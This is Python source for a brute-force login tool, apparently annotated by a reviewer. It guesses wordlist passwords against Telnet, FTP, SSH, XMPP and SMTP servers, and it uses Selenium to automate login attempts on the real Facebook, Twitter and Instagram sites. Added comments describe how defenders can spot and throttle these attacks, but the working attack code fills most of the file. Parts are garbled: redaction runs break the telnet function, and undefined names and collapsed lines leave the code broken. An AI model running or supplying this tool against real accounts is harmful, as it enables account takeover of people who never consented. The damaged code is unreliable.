def telnetBruteforce(self, address, username, wordlist, port, delay):
    """Attempt a Telnet login for `username` against `address`.

    NOTE(review): this listing is damaged. The two `******` runs below are
    where the page's scrubber replaced text between the string "login: " /
    "Password: " and the next "\n" literal. The statements that open the
    wordlist, loop over it and bind `password` are not visible here, and the
    block is not valid Python as shown.

    `port` is accepted but not used by any statement visible in this block.

    Defensive view: Telnet carries the username and every candidate password
    in cleartext, so both the guessing run and any recovered credential are
    visible to network monitoring, and each attempt is a separate login event
    on the target host.
    """
    telnet = telnetlib.Telnet(address)
    # Wait for the login prompt (text after "login: " lost to redaction).
    telnet.read_until("login: "******"\n")
    try:
        telnet.write(username + "\n")
        # Wait for the password prompt (text after "Password: " lost to redaction).
        telnet.read_until("Password: "******"\n")
        # NOTE(review): writes through `tn`, a name not bound in the visible code;
        # every other call here uses `telnet`.
        tn.write("vt100\n")
        # The recovered credential is printed to the console in cleartext.
        colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
        telnet.close()
        wordlist.close()
        exit(0)
    except socket.error:
        colors.error("[!] Error: Connection Failed. [!]")
    except KeyboardInterrupt:
        # Ctrl-C: release the connection and the wordlist handle, exit non-zero.
        telnet.close()
        wordlist.close()
        exit(1)
    except EOFError:
        # The remote side closing the connection is treated as a rejected password.
        colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
        time.sleep(delay)
    except Exception as e:
        colors.error("Error caught! Name: {}".format(e))
def execute(self):
    """Check that the target username exists, then start the web login loop.

    Reads `self.username`, `self.service`, `self.wordlist` and `self.delay`.
    Exits the process when `self.usercheck(...)` returns 1.

    Defensive view: the existence check runs before any password is tried,
    so a service that answers differently for known and unknown usernames
    is what lets this step succeed; uniform responses remove that signal.
    """
    print(P, "[*] Checking if username exists...", W)
    # usercheck() is defined outside this listing; a return value of 1 is
    # treated here as "username not found".
    if self.usercheck(self.username, self.service) == 1:
        colors.error("[!] The username was not found! Exiting...")
        exit()
    colors.good("[*] Username found! Continuing...")
    sleep(1)
    print("Using {} seconds of delay. Default is 1 second".format(
        self.delay))
    self.webBruteforce(self.username, self.wordlist, self.service, self.delay)
def ftpBruteforce(self, address, username, wordlist, port, delay):
    """Try each line of the wordlist file as the FTP password for `username`.

    `wordlist` arrives as a path and is rebound to the open file object.
    The process exits with status 0 on the first accepted login and with
    status 1 on Ctrl-C.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from statement order and should be confirmed against
    the upstream file.

    Defensive view: every candidate is a fresh connect-and-login on the
    control channel, so the server sees a run of rejected logins for one
    account, spaced roughly `delay` seconds apart, from a single source.
    Per-account lockout or per-source throttling on the FTP service stops
    this loop; plain FTP also exposes each candidate in cleartext.
    """
    wordlist = open(wordlist, 'r')
    ftp = ftplib.FTP()
    for i in wordlist.readlines():
        # Only the trailing newline is stripped; other whitespace is kept.
        password = i.strip("\n")
        try:
            ftp.connect(address, port)
            ftp.login(username, password)
            # The recovered credential is printed to the console in cleartext.
            colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
            ftp.quit()
            wordlist.close()
            exit(0)
        except ftplib.error_perm:
            # A permanent error reply from the server is treated as a wrong
            # password; the loop sleeps before the next attempt.
            colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
            time.sleep(delay)
        except ftplib.all_errors as e:
            # Any other ftplib/socket failure is reported, with no sleep.
            colors.error("Error caught! {}".format(e))
        except KeyboardInterrupt:
            ftp.quit()
            wordlist.close()
            exit(1)
def sshBruteforce(self, address, username, wordlist, port, delay): wordlist = open(wordlist, 'r') # Processing wordlist... for i in wordlist.readlines(): password = i.strip("\n") try: response = self.ssh_connect(address, username, password, port) if response == 0: colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password)) elif response == 1: colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password)) time.sleep(delay) elif response == 2: colors.error("[!] Error: Connection couldn't be established to address. Check if host is correct, or up! [!]") exit(1) except Exception as e: colors.error("Error caught! {}".format(e)) pass except KeyboardInterrupt: exit(1) wordlist.close()
def xmppBruteforce(self, address, username, wordlist, port, delay):
    """Try each line of the wordlist file as the XMPP password for `username`.

    One client connection is opened before the loop and reused for every
    `client.auth(...)` call. `Client` is imported outside this listing.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from statement order and should be confirmed against
    the upstream file.

    Handler order matters here: `except Exception` comes first, so the bare
    `except:` at the end only receives exceptions that are neither
    `Exception` subclasses nor `KeyboardInterrupt`.

    Defensive view: all attempts arrive over a single long-lived stream, so
    a per-connection limit on failed authentications is the control that
    applies; per-connection rate limits keyed only on new connections
    would not see this pattern.
    """
    wordlist = open(wordlist, 'r')
    client = Client(str(address))
    client.connect(server=(str(address), port))
    for i in wordlist.readlines():
        # Only the trailing newline is stripped; other whitespace is kept.
        password = i.strip("\n")
        try:
            if client.auth(username, password):
                client.sendInitPresence()
                # The recovered credential is printed to the console in cleartext.
                colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
                client.disconnect()
                wordlist.close()
                exit(0)
        except Exception as e:
            colors.error("Error caught! Name: {}".format(e))
        except KeyboardInterrupt:
            client.disconnect()
            wordlist.close()
            exit(1)
        except:
            colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
            time.sleep(delay)
def smtpBruteforce(self, address, username, wordlist, delay, port):
    """Try each line of the wordlist file as the SMTP AUTH password.

    Note the parameter order: `delay` comes before `port` here, unlike the
    other protocol functions in this listing.

    One SMTP connection is opened before the loop; EHLO and STARTTLS are
    issued again on every iteration before the login call.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from statement order and should be confirmed against
    the upstream file.

    Defensive view: the mail server sees repeated AUTH failures for one
    mailbox on one session. Limiting failed AUTH commands per session and
    per account, and alerting on them, covers this pattern.
    """
    wordlist = open(wordlist, 'r')
    s = smtplib.SMTP(str(address), port)
    for i in wordlist.readlines():
        # Only the trailing newline is stripped; other whitespace is kept.
        password = i.strip("\n")
        try:
            s.ehlo()
            s.starttls()
            # This line names the method without calling it (no parentheses).
            s.ehlo
            s.login(str(username), str(password))
            # The recovered credential is printed to the console in cleartext.
            colors.good("[*] Username: {} | [*] Password found: {}\n".format(username, password))
            s.close()
            wordlist.close()
            exit(0)
        except smtplib.SMTPAuthenticationError:
            colors.warn("[*] Username: {} | [*] Password: {} | Incorrect!\n".format(username, password))
            time.sleep(delay)
        except Exception as e:
            # The message uses a "%s" placeholder with str.format(), so the
            # exception text is not inserted into the output.
            colors.error("Error caught! %s".format(e))
        except KeyboardInterrupt:
            s.close()
            wordlist.close()
            exit(1)
def main():
    """Parse the command line and dispatch to the matching module.

    The service name selects one of three paths: protocol login guessing
    (`protocols.ProtocolBruteforce`), web login guessing
    (`web.WebBruteforce`) or hash cracking (`hashcrack.HashCrack`).
    All three classes are defined outside this listing.

    NOTE(review): the page collapsed this function onto two lines. The
    banner below has lost its line breaks, and the backslash continuations
    inside the `--service` argument are reproduced as they appear on the
    page. The nesting is reconstructed from statement order.
    """
    print(""" _ _ _____ | |__ _ __ _ _| |_|___ / | '_ \| '__| | | | __| |_ \ | |_) | | | |_| | |_ ___) | |_.__/|_| \__,_|\__|____/ security-oriented bruteforce tool. """)
    parser = argparse.ArgumentParser(
        description='Bruteforce framework written in Python')
    required = parser.add_argument_group('required arguments')
    required.add_argument('-s', '--service', dest='service',
        help="Provide a service being attacked.\ The Protocols and Services supported are SSH, FTP, SMTP, XMPP, TELNET, INSTAGRAM, FACEBOOK, TWITTER, MD5, SHA1, SHA224" ,\
        metavar='',
        choices=['ssh', 'ftp', 'smtp', 'xmpp', 'telnet', 'instagram', 'facebook', 'twitter', 'md5', 'sha1', 'sha224'])
    required.add_argument(
        '-u', '--username', dest='username',
        help=
        'Provide a valid username/hashstring for service/protocol/hashcrack being executed'
    )
    required.add_argument('-w', '--wordlist', dest='wordlist',
        help='Provide a wordlist or directory to a wordlist')
    parser.add_argument(
        '-a', '--address', dest='address',
        help=
        'Provide host address for specified service. Required for certain protocols'
    )
    parser.add_argument(
        '-p', '--port', type=int, dest='port',
        help=
        'Provide port for host address for specified service. If not specified, will be automatically set'
    )
    parser.add_argument(
        '-d', '--delay', type=int, dest='delay',
        help=
        'Provide the number of seconds the program delays as each password is tried'
    )
    args = parser.parse_args()
    # Specify mandatory options. The "required arguments" group above is
    # only a help-text grouping; presence is enforced by this loop.
    man_options = ['username', 'wordlist']
    for m in man_options:
        if not args.__dict__[m]:
            parser.print_help()
            colors.error(
                "[!] You have to specify a username AND a wordlist! [!]")
            exit(1)
    # Detect if the service argument is provided.
    if args.service is None:
        colors.error("[!] No service provided! [!]")
        exit(1)
    # Detect if the wordlist path is correct.
    if os.path.exists(args.wordlist) == False:
        colors.error("[!] Wordlist not found! [!]")
        exit(1)
    # Check if the service provided is for hashcracking.
    # NOTE(review): this test reads a bare `HASHCRACK`, while the dispatch
    # further down reads `colors.HASHCRACK`.
    if args.service in HASHCRACK:
        colors.warn("[!] Hashcrack detected! [!]")
        colors.good("[*] Hashstring: {}".format(args.username))
    else:
        colors.good("[*] Username: {}".format(args.username))
    time.sleep(0.5)
    colors.good("[*] Wordlist: {}".format(args.wordlist))
    time.sleep(0.5)
    # NOTE(review): this line reads `arg`, while the parsed namespace above
    # is bound to `args`.
    print(C + "[*] Service: {}".format(arg.service) + W)
    if args.delay is None:
        colors.warn("[?] Delay not set! Default to 1 [?]")
        args.delay = 1
    time.sleep(0.5)
    # Main program execution: dispatch on the service category.
    if args.service in colors.PROTOCOLS:
        # Perform protocol-based bruteforce.
        p = protocols.ProtocolBruteforce(args.service, args.address,
                                         args.username, args.wordlist,
                                         args.port, args.delay)
        p.execute()
    elif args.service in colors.WEB:
        # Web services do not require addresses or ports.
        if args.address or args.port:
            colors.error(
                "[!] NOTE: You don't need to provide an address OR port [!]")
            exit(1)
        # Perform web-based bruteforce.
        w = web.WebBruteforce(args.service, args.username, args.wordlist,
                              args.delay)
        w.execute()
    elif args.service in colors.HASHCRACK:
        # Hashcrack does not require address or port.
        if args.address or args.port:
            colors.error(
                "[!] NOTE: You don't need to provide an address OR port [!]")
            exit(1)
        # Perform hashcracking.
        h = hashcrack.HashCrack(args.service, args.username, args.wordlist,
                                args.delay)
        h.execute()
def webBruteforce(self, username, wordlist, service, delay):
    """Submit each wordlist line through a site's login form via Selenium.

    Opens a Firefox window, loads the login page for `service`
    ("facebook", "twitter" or "instagram"), then for every candidate fills
    the username and password fields and presses Return. Success is
    inferred from the page title: while the title still contains the login
    page's text the attempt counts as rejected; when it no longer does, the
    `assert` fails and the `AssertionError` branch reports a hit.

    NOTE(review): the page lost the original indentation; the nesting below
    is reconstructed from statement order and should be confirmed against
    the upstream file.

    Defensive view: because a real browser submits the form, the requests
    carry ordinary browser headers and run the page's scripts, so
    user-agent filtering does not separate this traffic from genuine
    logins. What remains visible is the server-side count of failed logins
    per account and per source, which is where lockout, step-up challenges
    and alerting apply. The title-based success test is also a heuristic:
    any page change, including an interstitial challenge, is reported as a
    found password.
    """
    driver = webdriver.Firefox()
    if service == "facebook":
        driver.get("https://touch.facebook.com/login?soft=auth/")
    elif service == "twitter":
        driver.get("https://mobile.twitter.com/session/new")
    elif service == "instagram":
        driver.get("https://www.instagram.com/accounts/login/")
    wordlist = open(wordlist, 'r')
    for i in wordlist.readlines():
        # Only the trailing newline is stripped; other whitespace is kept.
        password = i.strip("\n")
        try:
            sleep(2)  # wait for all elements to load
            # Find username element dependent on service
            if service == "facebook":
                elem = driver.find_element_by_name("email")
            elif service == "twitter":
                elem = driver.find_element_by_name(
                    "session[username_or_email]")
            elif service == "instagram":
                elem = driver.find_element_by_name("username")
            elem.clear()
            elem.send_keys(username)
            # Find password element dependent on service
            if service == "facebook":
                try:
                    elem = driver.find_element_by_name("pass")
                except NoSuchElementException:
                    # Password field not present yet: submit the username
                    # field first, then look the password field up again.
                    elem.send_keys(Keys.RETURN)
                    elem = driver.find_element_by_name("pass")
            elif service == "twitter":
                elem = driver.find_element_by_name("session[password]")
            elif service == "instagram":
                elem = driver.find_element_by_name("password")
            elem.clear()
            elem.send_keys(password)
            elem.send_keys(Keys.RETURN)
            sleep(
                delay
            )  # need to wait for page to load, sleep for delay seconds.
            # Check for changes in driver.title. The asserts are control
            # flow here: passing means "still on the login page".
            if service == "facebook":
                assert (("Log into Facebook | Facebook") in driver.title)
            elif service == "twitter":
                assert (("Twitter") in driver.title)
            elif service == "instagram":
                assert (("Instagram") in driver.title)
            colors.warn(
                "[*] Username: {} | [*] Password: {} | Incorrect!\n".
                format(username, password))
            sleep(delay)
        except AssertionError:
            # AssertionError: treated as a successful login, since the
            # expected string is no longer in the title, meaning that the
            # page has changed.
            # The recovered credential is printed to the console in cleartext.
            colors.good(
                "[*] Username: {} | [*] Password found: {}\n".format(
                    username, password))
            exit(0)
        except Exception as e:
            colors.error("Error caught! {}".format(e))
            exit(1)